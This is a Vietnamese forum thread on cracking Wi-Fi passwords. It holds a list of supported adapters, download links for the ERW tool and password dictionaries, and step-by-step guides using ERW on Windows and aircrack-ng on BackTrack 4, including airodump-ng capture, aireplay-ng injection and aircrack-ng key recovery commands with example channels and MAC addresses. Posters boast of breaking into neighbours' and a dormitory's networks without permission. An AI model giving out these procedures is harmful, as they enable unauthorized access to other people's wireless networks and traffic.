LinkSys WPC55AG Dual-Band Wireless A+G Notebook Adapter
NETGEAR WAG511 802.11abg Dual Band Wireless PC Card
NETGEAR WG511T 108 Mbps Wireless PC Card
NETGEAR WG511U 54AG+ Wireless PC Card
NETGEAR WG511U Double 108 Mbps Wireless PC Card
NETGEAR WPN311 RangeMax Wireless PCI Adapter
NETGEAR WPN511 RangeMax Wireless PC Card
Proxim ORiNOCO 802.11ag ComboCard Gold 8480
Proxim ORiNOCO 802.11ag ComboCard Silver 8481
Proxim ORiNOCO 802.11ag PCI Adapter 8482
Proxim ORiNOCO 802.11bg ComboCard Gold 8470
Proxim ORiNOCO 802.11bg ComboCard Silver 8471
SMC 2336W-AG v2 Universal Wireless Cardbus Adapter
TRENDnet TEW-501PC 108Mbps 802.11ag Wireless CardBus PC Card
Ubiquiti Networks SRC Wireless Network Adapter
CACE Technologies AirPcap Ex USB Adapter 
link :
http://www.mediafire.com/?sharekey=5...db6fb9a8902bda
các bạn tải file driver về cài driver card wireless+erw 2.4_3 
nhớ cài driver bằng cách chọn cài ép ko cho win auto search
mình đã crack thành công wep key khoảng 30p,wpa2 key thì khi lấy key khoảng 5p nhưng dò td mất cả tuần,mà hên pass nó đặt toàn số ko nên mới dò ra,trên đó có cả ct tạo td+1 số td làm sẳn







 


Trích

 nggianglx 
View Post


mình cũng đã có nghe qua cách hack WPA dùng thuật toán TKIP. Các bạn có thể tham khảo ở đường link bên dưới. Chịu khó đọc tiếng anh nha, rất hay.

http://www.aircrack-ng.org/doku.php?id=tkiptun-ng







 


Trích

 nggianglx 
View Post


Đây là một công cụ Hack Wireless phiên bản ERW 2.7. Bạn namquang1233 đã đề cập, mình cung cấp cho các bạn phiển bản mới nhất hiện nay do Spain phát triển.

Chú ý: khi sử dụng nên xem CPU (mình đã test thử tốn tài nguyên lắm, nhất là CPU)

Mọi người cùng tham khảo nha
http://www.mediafire.com/?sharekey=9...f0d5667eceaea4







 


Trích

 namquang1233 
View Post


Bạn vào đây tải file passview+dic về trong đó có sẵn vài dic mình sưu tầm được và pm tạo dic,bạn do key wpa nên xài AIRCRACK-NG-1.0-RC2 trở lên,tốc độ tăng hơn nhiều,cpu amd x2 tăng gấp đôi,cpu core 2 tăng gấp 4 lần so với bản rc1.
http://www.mediafire.com/?sharekey=5...db6fb9a8902bda




hack wpa from namquang ^^! (try it)





 


Trích

 namquang1233 
View Post


Vậy mình hướng dẩn cách crack trên winxp bằng erw 2.7
đầu tiên các bạn down driver,erw 2.7.1,aircrack-ng-1.0-rc3-win giải nén ra hết
bước 1:cài driver cho card wireless
vào device manager/network adater/tên card wireless trên máy,update driver chọn hàng dưới cho tới khi có nút have disk bấm vào chọn đến folder driver vừa giải nén,nếu card thích hợp thì chỉ có 1 hoặc 2 tên hiện ra nếu ko thì nó sẽ hiện hết toàn bộ card trong driver đó,khi đó bạn thử từng cái xem cái nào chạy được,nếu driver cài được thì trước tên card phải có chữ commview,khi cài driver xong thì card wireless vẫn hoạt động bình thường như driver gốc.
bước 2:chạy ct erw 
a.bấm monitor (nếu driver cài đúng thì nó sẽ tự động thu xuống thanh taskbar nếu ko thì nó sẽ thoát ra)
b.bấm auto-scan,nó sẽ hiện những mạng xung quanh,double-click vào tên mạng muốn hack.Nếu cpu yếu,ko có máy station nếu WPA hoặc sóng yếu thì nó sẽ khó hiện lên,bạn cho auto-scan vài lần,nếu ko hiện thì bạn phải đánh bằng tay những thông số bên trái :
kế nút del,file,ssid ap thì đánh tên ssid (tên trong ct scan của win)
ch

channel của mạng cần hack)
mac ap:MAC của ap cần hack
mac sta:MAC của client(cần khi hack WPA còn WEP thì khỏi)
mac falsa:MAC của card mạng đang monitor(nếu ko biết bạn chạy ct mac address changer trong folder erw(nếu AP bị khóa MAC thì dùng ct này để đổi MAC)
encriptacion:khóa mà ap đang xử dụng(WEP,WPA,WPA2)
c.1 hack WEP: bấm MODO AUTOMATICO rồi chờ data tăng lên.
2 hack WPA:bấm CAPTURA DE PAQUETES
chờ khi có máy client thì đánh MAC vào MAC STA nếu ko thì tắt thử lúc khác(bắt buộc phải có máy client mới có thể làm được)
khi có máy client thì xem data nếu nó lên liên tục thì bấm A0-AP/STA (tốt nhất là chờ nó close hết các cửa sổ mới hiện lên khoảng 30s bấm lại lần nữa làm 3 lần)xem cửa sổ CAPTURA DE PAQUETES hàng trên hết hiện lên WPA handshake: MAC AP là xong.Nếu máy client xài Win vista thì khi bấm A0-AP/STA data sẽ đứng ngay khi đó thoát hết cửa sổ CAPTURA DE PAQUETES rồi bấm lại xem nó có mất máy client,nếu mất thì bạn để nguyên chờ đến khi máy client hiện lên lại là có WPA handshake (nếu sóng đủ mạnh)mình đã thử máy nhà khi xài Win vista sp2 (sp1 trở về trước chưa thử)khi bấm A0-AP/STA là card wireless bị treo ko thấy bất cứ mạng nào phải restart máy mới trở lại bình thường winxp thì ko bị.
bước 3:dò key
mở ct aircrack-ng gui trong folder aircrack-ng-1.0-rc3-win\bin
phần filename nhấn choose chọn file đã lưu bằng ct erw (thường tên file có kèm theo số phía sau vì mỗi lần bạn bấm CAPTURA DE PAQUETE hoặc MODO AUTOMATICO thì nó sẽ tạo 1 file mới nên tốt nhất trước khi bấm nên xóa hết những file trước đó để khỏi bị rối,flie có đuôi .cap)
dò key wep thì để nguyên bấm lauch
dò key wpa thì chọn wpa phần wordlist thì chọn file có tự điển xong bấm lauch
trong file passview+dic có sẵn ct passwordspro dùng để tạo td hoặc password,mở ct lên bấm F8 tạo td chọn tạo số hoặc kí tự độ dài chọn xong bấm F5 để ct tự tạo td(nhớ xem dung lượng trước khi bấm F5 và phải ít nhất là 8 kí tự trở lên vì pass WPA thấp nhất là 8 kí tự) và một số td có những pass thông dụng tiếng anh bạn có dùng những td đó trước nếu ko có thì mới tạo td bắng passwordpro,mình cũng dò được key trong đám td đó.
khi dò pass bằng td nó nên để ý nhiệt độ cpu nếu nó nóng quá nên tìm cánh khắc phục trước khi dò bởi nếu dò nửa chừng máy bị treo thì phải làm lại từ đầu.







 


Trích

 hoasimtim.hm 
View Post


He he..tui da Hack thanh cong 100% rui ne...dung BT4 beta nhu bai viet huong dan..hack dc 2 thang wep key...tui thay cung phai tim hieu ki cang va it nhat ban pai co mot it von ve IT....tui HD lai cac lam cua tui nghen...co ai chua lam dc thi cu lam theo nhe...
1, download ban BT4 beta ve ghi ra dia....
2, ban download them chuong trinh Network Stumbler hoặc Cain ve de do MAC va kenh cua wifi can crack(Vi khi vao BT4 toi go lenh aimo-ng wlan0 thi ko chay dc->ko do dc MAC va Kenh)
3,ban khoi dong lai may....cho dia BT4 beta vao va an F12...bam Enter thi phai......
cho cho no chay xong ... go lenh startx vao
luc nay no se hien len cua so chinh cua BT4 co giao dien nhu ban xem video huong dan luon...cung kha giong giao dien cua win do....
4, ban go lenh airmon-ng roi bam enter
de bit dc cac wifi minh duong...thuong la wlan0 ,neu ban dung 1 cac wifi
5, ban go tiep lenh airodump-ng -w wep -c (kenh) --bssid (Mac) wlan0 bam enter
Vidu: airodump-ng -w wep -c 11 --bssid 00:1a:2b:2b:45:10 wlan0
luc nay cac thong so bat dau chay nhung co the con cham...nhat la data co the tang rat cham
6, Ban go tiep lenh aireplay-ng -10 -a (Mac) wlan0
vi du: aireplay-ng -10 -a 00:1a:2b:2b:45:10 wlan0
7, ban go tiep lenh aireplay-ng -3 -b (mac) wlan0
luc naycac goi packets bat dau gui di...luong data bat dau tang nhanh....nhung cung co the ban phai cho khoang 10 den 15 phut thi khi do data tang moi nhanh..toi da phai thu di thu lai rat nhieu lan 
8.Ban cho cho luong data len khoang tren 30 000 hoac 40 000 hoac lon hon (luc nay data co the dat den con so nay thi no phai chay cung nhanh roi...chu ko tang cham nhu luc dau nua)
Tiep theo ban go lenh dir thi no se hien ra ten five ma minh da luu cac du lieu gui va nhan packets co dang wep-01.cap hoac wep-02.cap....
9 ban go tiep lenh aircrack-ng -wep-01.cap (tuy theo ten thu duoc ma lenh tren ban go)
luc nay la ket qua.. key fond se hien ra...va do la pass ma minh can tim....

Chu y: 1. ban phai go dung lenh tung khoang trong, dau cach"-" ,neu ko thi no se ko chay ....luc dau toi cung da go sai nhieu lan....
2. Toi dung lap top HP...cac mang wifi cua toi la loai boocam thi phai....va cung da dung usb Wifi dlink534 cung co ho tro de crack...ngoai ra toi da thu dung voi 2may khac la loai asus cua 2 thang ban thi nhu hinh ko ho tro thi phai...go lenh vao ma no ko chay cac thong so.... 


Tren la mot so buoc toi da lam va da thanh cong...pha duoc 3 cai pass roi...Toi o kitucxa..pha dc mot cai pas ma chua qua 3 ngay ca kituc deu bit...pass...nguoi ta ma tra ra thi het duong chay toi...
co the thay rang nhu cau dung wifi chua rat lon...hihi:d